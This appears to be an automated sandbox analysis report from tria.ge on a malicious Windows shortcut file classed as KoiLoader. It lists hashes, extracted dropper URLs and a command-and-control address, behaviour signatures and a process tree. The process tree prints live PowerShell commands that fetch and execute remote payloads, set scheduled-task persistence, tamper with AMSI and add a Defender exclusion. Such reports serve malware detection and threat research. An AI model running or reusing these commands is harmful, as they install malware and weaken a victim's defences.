Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

9ee3acebaa...39.lnk

windows7-x64

10

9ee3acebaa...39.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    105s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/12/2024, 08:16

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9ee3acebaae539dc60ea9321cfcf27451f6f05afc80ae7f7a959f76a8d587839.lnk

  • Size

    3KB

  • MD5

    f7f1052c9d09d61490d8f116238af21e

  • SHA1

    0f2550bb03f31716232de245a02823885f529e09

  • SHA256

    9ee3acebaae539dc60ea9321cfcf27451f6f05afc80ae7f7a959f76a8d587839

  • SHA512

    51737afa22f193a892525226575877a0893521ffd3dec18542a7f2b0cdef5807f736ae4458a5cf7f306c8e033fdacea870d9527529172f74cbbdbcde8a646568

Score
10/10
koiloaderdefense_evasiondiscoveryexecutionloader

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php
exe.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
exe.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
exe.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1

Extracted

Family

koiloader

C2

http://195.123.217.43/oversate.php

Attributes
  • payload_url

    https://www.italialife24.it/wp-content/uploads/2021/05

Signatures

  • KoiLoader

    KoiLoader is a malware loader written in C++.

    loaderkoiloader
  • Koiloader family
    koiloader
  • Detects KoiLoader payload 2 IoCs
    loader
  • Blocklisted process makes network request 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

    execution
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Indicator Removal: Clear Persistence 1 TTPs 2 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

    defense_evasion
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\9ee3acebaae539dc60ea9321cfcf27451f6f05afc80ae7f7a959f76a8d587839.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1868
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2128
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\Admin\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:1892
  • C:\Windows\system32\wscript.EXE
    C:\Windows\system32\wscript.EXE C:\Users\Admin\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1956
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\D4630EFLGT98.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\D4630EFLGT98.js "
      2⤵
      • Blocklisted process makes network request
      • Indicator Removal: Clear Persistence
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2420
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /delete /tn evQtmlDaSRMzUk.js /f
        3⤵
          PID:3000
        • C:\Windows\system32\wscript.exe
          "C:\Windows\system32\wscript.exe" C:\ProgramData\D4630EFLGT98.js
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:1756
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php'; $l2 = 'https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7zEYA217ZZLO'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:428
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'https://www.italialife24.it/wp-content/uploads/2021/05/sd2.ps1')"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4296
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command IEX(IWR -UseBasicParsing 'https://www.italialife24.it/wp-content/uploads/2021/05/sd2.ps1')
                6⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4928
    • C:\Windows\SysWOW64\DllHost.exe
      C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      1⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4000
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3408
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:532
    • C:\Windows\system32\wscript.EXE
      C:\Windows\system32\wscript.EXE C:\Users\Admin\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4736
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\D4630EFLGT98.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\D4630EFLGT98.js "
        2⤵
        • Blocklisted process makes network request
        • Indicator Removal: Clear Persistence
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3912
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /delete /tn evQtmlDaSRMzUk.js /f
          3⤵
            PID:3808
          • C:\Windows\system32\wscript.exe
            "C:\Windows\system32\wscript.exe" C:\ProgramData\D4630EFLGT98.js
            3⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:1644
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php'; $l2 = 'https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7zG08GUBWYV4'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"
              4⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2400
      • C:\Windows\System32\wscript.exe
        C:\Windows\System32\wscript.exe "C:\ProgramData\rdc5cddf5-9e4b-4c89-ba53-89649a7a5ee7r.js"
        1⤵
          PID:4708

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\D4630EFLGT98.js
          Filesize

          1KB

          MD5

          4c3df89eb3187ea69c3edce832a9f421

          SHA1

          4a4b0278782d82aca81fe1f140df24900775e94e

          SHA256

          69cb0ab405de7aaa54d6d07f42f3de428dbf4daf0b1863b17e86635451f69829

          SHA512

          c8ed6a8460c8ba873ff14f7448b94d3b604c2dabdbd4c5028a59c1f2b5e52cb6a8af504bb89f14d50c07e8718c77b22a9b0f6b6e17a8d5dbfc883ecb170daee9

          Download Submit

        • C:\ProgramData\D4630EFLGT98.js
          Filesize

          1KB

          MD5

          4307160fb0f69c88fa5e4d07c729ecec

          SHA1

          c951dbf02ead1e6fc74013150272194f0c06179c

          SHA256

          7510a26d7ccc0b3e04dc3938a766833e592d601d9d6daf3a07684288774a7d22

          SHA512

          26f68d90ddcf2de2c5557991821bcf4eb796558439d3d0defce50639f71c9730ccaf42a2e2839c38405d6ac1a03a01dad95209e223f3fb54370dc3b8d8aefa0f

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          2f57fde6b33e89a63cf0dfdd6e60a351

          SHA1

          445bf1b07223a04f8a159581a3d37d630273010f

          SHA256

          3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

          SHA512

          42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          3d086a433708053f9bf9523e1d87a4e8

          SHA1

          b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

          SHA256

          6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

          SHA512

          931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
          Filesize

          53KB

          MD5

          06ad34f9739c5159b4d92d702545bd49

          SHA1

          9152a0d4f153f3f40f7e606be75f81b582ee0c17

          SHA256

          474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

          SHA512

          c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          19KB

          MD5

          d3d7f9fd57dc432a437b90edb119eff5

          SHA1

          420a0faeb4ea32f73699d5e0619f2dc1aa1a9e31

          SHA256

          edb0d84a3d08009f1d2461548ceed06d3b83277c2308dd67af8cf1f195f26c64

          SHA512

          3dd85c4faa52e830623a7d71439df3a2e7b3dd1abef69dd2a933f9845d61423bad002e17ff2e20292284a66148d73e6db53767be42cfc719da1f95ddddc902af

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          477031a32089e6d066092d640b526add

          SHA1

          5041602c7c71b4c6e40928039dcc07b6b32a67f2

          SHA256

          0ec3dcb238a28e1b43e2f7b03f955f6304927314c40a51f1d4b2b00345c12bef

          SHA512

          01388ea1af8248901beb17d1fa62efead2ae1bf9accfc8e132f4f0c0e77c068fd7e998d218043fdc90c497824ca3723689502490da4fd97237a4f0d40ef2bb4e

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          e936ffde1732f536cc835ed3e6c83842

          SHA1

          05a7c09e599c32003ea21329932a032ace4f592c

          SHA256

          da9997a3db22d4c3b7900392af3d4a88d09de0df6c4a75d89ea1b271edbb2552

          SHA512

          35d49450a82c671843080c2ff2ff0d33aa5640234958b7e417a9c2f9e20e24b752a4793a99662253e7ad892dcd70904f6524d5e71c0d80333d7d01741c115870

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          08f9f3eb63ff567d1ee2a25e9bbf18f0

          SHA1

          6bf06056d1bb14c183490caf950e29ac9d73643a

          SHA256

          82147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0

          SHA512

          425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vtxklljw.suk.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\evQtmlDaSRMzUk.js
          Filesize

          304B

          MD5

          0dd3acac2a27b3df958e23b185b2d917

          SHA1

          f12629bd016d66d2c49c821ef7520948d5de16b7

          SHA256

          c6c87046aa360b5f132f111858c12171fbb765486b79265dd0df273a173ff838

          SHA512

          bb4f0234b93aa3ee7e62e79fdf48bdc8daff404761f56b31ec2ee9ce17ea28f3ffc95e60178474ee7be45f4a00330155bb738daecbb18457f93b81d7e6634d73

          Download Submit

        • memory/428-56-0x0000000007430000-0x000000000743D000-memory.dmp

          Filesize

          52KB

          Download

        • memory/428-37-0x0000000004C10000-0x0000000004C32000-memory.dmp

          Filesize

          136KB

          Download

        • memory/428-38-0x0000000005440000-0x00000000054A6000-memory.dmp

          Filesize

          408KB

          Download

        • memory/428-39-0x00000000054B0000-0x0000000005516000-memory.dmp

          Filesize

          408KB

          Download

        • memory/428-49-0x00000000055E0000-0x0000000005934000-memory.dmp

          Filesize

          3.3MB

          Download

        • memory/428-36-0x0000000004CA0000-0x00000000052C8000-memory.dmp

          Filesize

          6.2MB

          Download

        • memory/428-51-0x0000000005C60000-0x0000000005C7E000-memory.dmp

          Filesize

          120KB

          Download

        • memory/428-52-0x0000000006040000-0x000000000608C000-memory.dmp

          Filesize

          304KB

          Download

        • memory/428-53-0x0000000005FD0000-0x0000000005FEA000-memory.dmp

          Filesize

          104KB

          Download

        • memory/428-54-0x00000000074A0000-0x0000000007B1A000-memory.dmp

          Filesize

          6.5MB

          Download

        • memory/428-55-0x0000000006E00000-0x0000000006E01000-memory.dmp

          Filesize

          4KB

          Download

        • memory/428-35-0x0000000004630000-0x0000000004666000-memory.dmp

          Filesize

          216KB

          Download

        • memory/532-92-0x00000000076A0000-0x0000000007736000-memory.dmp

          Filesize

          600KB

          Download

        • memory/532-70-0x0000000070370000-0x00000000703BC000-memory.dmp

          Filesize

          304KB

          Download

        • memory/532-80-0x00000000066C0000-0x00000000066DE000-memory.dmp

          Filesize

          120KB

          Download

        • memory/532-81-0x00000000072E0000-0x0000000007383000-memory.dmp

          Filesize

          652KB

          Download

        • memory/532-82-0x0000000007490000-0x000000000749A000-memory.dmp

          Filesize

          40KB

          Download

        • memory/532-69-0x00000000066E0000-0x0000000006712000-memory.dmp

          Filesize

          200KB

          Download

        • memory/532-93-0x0000000007620000-0x0000000007631000-memory.dmp

          Filesize

          68KB

          Download

        • memory/532-94-0x0000000007660000-0x000000000766E000-memory.dmp

          Filesize

          56KB

          Download

        • memory/532-95-0x0000000007670000-0x0000000007684000-memory.dmp

          Filesize

          80KB

          Download

        • memory/532-96-0x0000000007760000-0x000000000777A000-memory.dmp

          Filesize

          104KB

          Download

        • memory/532-97-0x0000000007740000-0x0000000007748000-memory.dmp

          Filesize

          32KB

          Download

        • memory/2128-2-0x00007FFB5BBD3000-0x00007FFB5BBD5000-memory.dmp

          Filesize

          8KB

          Download

        • memory/2128-18-0x00007FFB5BBD0000-0x00007FFB5C691000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2128-14-0x00007FFB5BBD0000-0x00007FFB5C691000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2128-13-0x00007FFB5BBD0000-0x00007FFB5C691000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2128-8-0x0000018CAA2F0000-0x0000018CAA312000-memory.dmp

          Filesize

          136KB

          Download

        • memory/2400-134-0x0000000007290000-0x000000000729D000-memory.dmp

          Filesize

          52KB

          Download

        • memory/4928-101-0x0000000008940000-0x0000000008EE4000-memory.dmp

          Filesize

          5.6MB

          Download

        • memory/4928-102-0x0000000008270000-0x000000000828A000-memory.dmp

          Filesize

          104KB

          Download

        • memory/4928-103-0x00000000083E0000-0x0000000008430000-memory.dmp

          Filesize

          320KB

          Download

        • memory/4928-104-0x00000000084D0000-0x0000000008562000-memory.dmp

          Filesize

          584KB

          Download

        • memory/4928-100-0x0000000007B50000-0x0000000007B72000-memory.dmp

          Filesize

          136KB

          Download